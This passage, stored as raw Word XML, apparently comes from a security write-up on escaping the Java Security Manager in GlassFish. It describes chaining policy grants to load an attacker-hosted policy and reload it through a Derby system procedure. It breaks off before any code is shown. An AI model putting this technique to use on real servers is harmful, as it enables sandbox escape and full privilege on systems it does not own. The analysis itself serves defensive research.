          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Glassfish default security policy (not enabled by default) is defined in: </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/glassfish4/glassfish/domains/domain1/config/server.policy </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(see:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/cd/E18930_01/html/821-2418/beabx.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will not reproduce the whole policy here but only the relevant parts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The most obvious attack vector is abusing the following policy element:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    permission java.io.FilePermission  "&lt;&lt;ALL FILES&gt;&gt;", "read,write"; </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Which will allow any class to write new classes in the privileged codebases. However, the policy file contains some security warnings about this policy element:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// The permission FilePermission "&lt;&lt;ALL FILES&gt;&gt;", "read,write"</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// allows all applications to read and write any file in the filesystem.</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// It should be changed based on real deployment needs. If you know your</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// applications just need to read/write a few directories consider removing</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// this permission and adding grants indicating those specific directories.</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// against the codebase of your application(s).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will not take this route since we hope this particular permission will not be that broad in a real deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In order to get </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AllPermission</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, we will abuse three different policy items:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant {permission java.util.PropertyPermission "*", "read,write"; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant {permission java.net.SocketPermission    "*", "connect"; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant codeBase "file:${com.sun.aas.derbyRoot}/lib/-" { permission java.security.AllPermission; };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will use (1) for changing </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.security.policy </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system property to a URL pointing to our own malicious policy (allows everything). Because of (2), the connection to grab our malicious policy will succeed since we are allowed to connect to any host on any port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Abusing these policy items allows untrusted code to change the system policy, but we still need to force the Security Manager to reload the new policy by calling </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.security.Policy.refresh().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is where (3) comes into play. Inspecting the derby classes which are granted </w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AllPermission</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> we find an interesting one:</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.apache.derby.catalog.SystemProcedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> which contains an interesting method:</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SYSCS_RELOAD_SECURITY_POLICY</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. From </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Derby documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“The SYSCS_UTIL.SYSCS_RELOAD_SECURITY_POLICY system procedure reloads the security policy, allowing you to fine-tune your Java security on the fly.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let's take a look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:anchor="L1936" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00005D3D">
          <w:rPr>
            <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>source code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005D3D" w:rsidRPr="00005D3D" w:rsidRDefault="00005D3D" w:rsidP="00005D3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try {</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    AccessController.doPrivileged(</w:t>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
